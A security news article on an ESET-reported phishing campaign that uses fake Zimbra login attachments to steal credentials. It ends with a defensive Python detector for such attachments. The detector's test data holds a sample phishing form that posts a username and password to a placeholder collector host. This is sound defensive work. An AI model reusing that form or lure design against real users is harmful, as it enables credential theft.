A new phishing campaign is targeting small and medium-sized businesses and government agencies that use the Zimbra Collaboration platform, in several countries, aiming to harvest credentials for use in potential further operations.
The campaign has been ongoing since at least April and, unlike some previous campaigns targeting Zimbra products, this one mainly relies on social engineering and does not exploit a vulnerability. Researchers at ESET discovered the campaign and have not been able to attribute it to any known attack group. Many of the known targeted organizations are in Poland, with others located in Italy, Ecuador, Russia, and elsewhere.
Zimbra Collaboration is a platform that includes email, calendar, and other functionality, and is popular with SMBs and small government agencies. The campaign that the ESET researchers uncovered begins like most phishing operations: with a malicious email attachment.
“Initially, the target receives an email with a phishing page in the attached HTML file. The email warns the target about an email server update, account deactivation, or similar issue and directs the user to click on the attached file. The adversary also spoofs the From: field of the email to appear to be an email server administrator,” the ESET researchers said.
“After opening the attachment, the user is presented with a fake Zimbra login page customized according to the targeted organization. The HTML file is opened in the victim’s browser, which might trick the victim into believing they were directed to the legitimate login page, even though the URL points to a local file path. Note that the Username field is prefilled in the login form, which makes it appear more legitimate.”
If the victim enters the credentials for the Zimbra Collaboration account, they’re then collected and sent to a remote server. In some cases, the researchers saw the attackers sending phishing emails from organizations that had been targeted previously. That likely means that the attackers stole admin credentials and were then able to spin up new mailboxes to send the phishing messages, which is a common tactic in these campaigns.
In the last few months there have been other campaigns targeting Zimbra products. In March, Proofpoint researchers identified a group known as Winter Vivern that was running a phishing campaign that included an exploit for a vulnerability (CVE-2022-27926) in Zimbra Collaboration. In July 2022, Google researchers warned of a zero day in Zimbra Collaboration that was being actively exploited, and three months later, another zero day emerged in the same product.
This recent campaign doesn’t include any exploitation of vulnerabilities, as far as the ESET researchers could see, but it was still effective.
“Despite this campaign not being so technically sophisticated, it is still able to spread and successfully compromise organizations that use Zimbra Collaboration, which remains an attractive target for adversaries. Adversaries leverage the fact that HTML attachments contain legitimate code, and the only telltale element is a link pointing to the malicious host,” the researchers said.
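One defender-side triage check for the telltale the researchers describe (a login form inside a local HTML attachment, prefilled username, credentials posted to a remote host), written here as an added example that is not ESET's code. It parses an HTML attachment with the standard library and flags a password form whose submission target, in the form action or in an absolute URL inside a script, is an external host; the sample attachment and its host names are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample attachment; hosts are placeholders, not real indicators.
SAMPLE_ATTACHMENT = """<html><body><h2>Zimbra Web Client</h2>
<form method="post" action="https://collector.example.invalid/submit.php">
  <input name="username" value="jane.doe@target.example">
  <input type="password" name="password">
  <button>Sign in</button></form></body></html>"""

class FormAuditor(HTMLParser):
    """Collect form targets, password fields, prefilled login fields, script URLs."""
    def __init__(self):
        super().__init__()
        self.form_actions, self.script_urls, self.prefilled = [], [], []
        self.has_password = self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input":
            if a.get("type", "").lower() == "password":
                self.has_password = True
            field = (a.get("name") or a.get("id") or "").lower()
            if a.get("value") and any(k in field for k in ("user", "login", "email")):
                self.prefilled.append(a["value"])
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        # A script may submit the form itself, so harvest absolute URLs from it too.
        if self._in_script:
            self.script_urls += re.findall(r"https?://[^\s'\"<>]+", data)

def audit_attachment(html: str) -> dict:
    """Flag a password form in a local HTML file that submits to an external host."""
    p = FormAuditor()
    p.feed(html)
    hosts = sorted({urlparse(u).hostname for u in p.form_actions + p.script_urls
                    if urlparse(u).hostname})
    return {"submit_hosts": hosts, "prefilled_login": p.prefilled,
            "suspicious": p.has_password and bool(hosts)}
```

A hit on `suspicious` is a triage signal for the mail gateway or SOC, not a verdict: a relative action such as `/zimbra/login` is not flagged, so legitimate saved login pages pass while a local file that posts credentials off-host does not.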